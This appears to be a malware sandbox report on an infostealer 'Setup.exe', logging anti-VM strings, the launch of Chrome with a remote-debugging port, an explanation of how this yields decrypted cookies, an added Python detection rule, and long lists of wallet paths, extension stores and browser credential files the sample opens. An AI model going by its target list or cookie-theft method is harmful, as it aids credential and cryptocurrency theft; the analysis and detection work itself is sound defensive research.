        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: THyper-V Hypervisor Root Virtual ProcessoreKV
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Dynamic Memory Integration Service?
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: &Hyper-V Hypervisorui
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor Logical Processorc.sys!X
        Source: chrome.exe, 0000000D.00000002.2621929269.00007FFFE5441000.00000020.00000001.01000000.0000000A.sdmp | Binary or memory string: xVMcI
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C2E2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.2535300930.000001B008D3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Hypervisor
        Source: chrome.exe, 0000000D.00000002.2538292926.000001B00C310000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: X2Hyper-V VM Vid Partition.dll
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --remote-debugging-port=9223
        Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
        Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
        Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: Setup.exe, 0000000A.00000002.2479161543.0000000000E23000.00000004.00000001.01000000.00000007.sdmp | Binary or memory string: procmon.exe
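        The process-creation entry above, where Setup.exe starts the real chrome.exe with --profile-directory="Default" and --remote-debugging-port=9223, is the behaviour behind the App-Bound Encryption bypass: once the legitimate browser is running with its DevTools endpoint open, the launching process can ask the browser itself for decrypted cookies and stored data over the DevTools protocol instead of recovering the app-bound key. The following detection logic is an added example for this report, not Joe Sandbox's or the malware's code; it evaluates Sysmon Event ID 1 / Windows 4688 style process-creation records, and the sample events in it are constructed for illustration (only the first mirrors the command line recorded above).

```python
"""Flag Chromium browsers started with remote debugging by a non-browser parent.

Added example, not part of the sandbox report. Input records mirror the fields
of Sysmon Event ID 1 / Windows 4688 (Image, ParentImage, CommandLine); the
SAMPLE_EVENTS list is constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe",
                     "vivaldi.exe", "chromium.exe"}
# --remote-debugging-port=<n> opens a TCP DevTools endpoint;
# --remote-debugging-pipe hands the parent a pipe instead (no port).
DEBUG_FLAG = re.compile(r"--remote-debugging-(?:port=(\d+)|pipe)", re.IGNORECASE)
# Launchers living in user-writable locations rank higher than developer
# tooling installed under Program Files.
USER_WRITABLE = re.compile(
    r"\\(AppData\\Local\\Temp|Downloads|AppData\\Roaming|Users\\Public)\\",
    re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> Optional[dict]:
    """Return a finding dict for a suspicious launch, or None."""
    if _basename(event.image) not in CHROMIUM_BROWSERS:
        return None
    match = DEBUG_FLAG.search(event.command_line)
    if match is None:
        return None
    # Child processes of the browser (renderer, gpu, utility) may carry copies
    # of the browser's switches; they have a browser parent and are benign here.
    if _basename(event.parent_image) in CHROMIUM_BROWSERS:
        return None
    port = int(match.group(1)) if match.group(1) else None  # None: pipe mode
    headless = "--headless" in event.command_line.lower()
    severity = "high" if USER_WRITABLE.search(event.parent_image) else "medium"
    return {
        "rule": "browser_started_with_remote_debugging",
        "parent": event.parent_image,
        "port": port,
        "headless": headless,
        "severity": severity,
    }


def hunt(events: Iterable[ProcessEvent]) -> List[dict]:
    return [f for f in (evaluate(e) for e in events) if f is not None]


CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

# Constructed sample events (illustrative; only the first mirrors the report).
SAMPLE_EVENTS = [
    ProcessEvent(CHROME,
                 r"C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe",
                 f'"{CHROME}" --profile-directory="Default" --remote-debugging-port=9223'),
    # Browser child process: inherits the switch, browser parent, ignored.
    ProcessEvent(CHROME, CHROME,
                 f'"{CHROME}" --type=renderer --remote-debugging-port=9223'),
    # Developer tooling under Program Files: reported at lower severity.
    ProcessEvent(CHROME, r"C:\Program Files\Microsoft VS Code\Code.exe",
                 f'"{CHROME}" --remote-debugging-port=9222'),
    # Ordinary user launch from the shell: no debugging switch.
    ProcessEvent(CHROME, r"C:\Windows\explorer.exe", f'"{CHROME}"'),
    # Pipe mode plus headless from a Downloads-resident launcher.
    ProcessEvent(CHROME, r"C:\Users\user\Downloads\update.exe",
                 f'"{CHROME}" --headless=new --remote-debugging-pipe'),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

        The parent-image exclusion is what keeps the rule quiet on a normal browser session, since every renderer and utility process is spawned by the browser itself; the severity tier only orders triage and is not a reason to drop the medium hits, because a developer tool being driven by malware looks the same at this layer.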

        Stealing of Sensitive Information

        Source: Yara match | File source: 0000000A.00000002.2480222478.0000000001329000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: s","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs`
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet},{"en":"nanjmdknhkinifnkgdcggcfnhdaammmj","ez":"Guild"},{"en":"nkddgncdjgjfcddamfgcmfnlhccnimig","ez":"SaZ
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
        Source: Setup.exe, 0000000A.00000002.2483621904.00000000013BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
        Source: Setup.exe, 0000000A.00000002.2483621904.000000000139D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
        Source: Setup.exe, 0000000A.00000002.2489986911.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live^
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Temp1_Malware.zip\Malware\Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
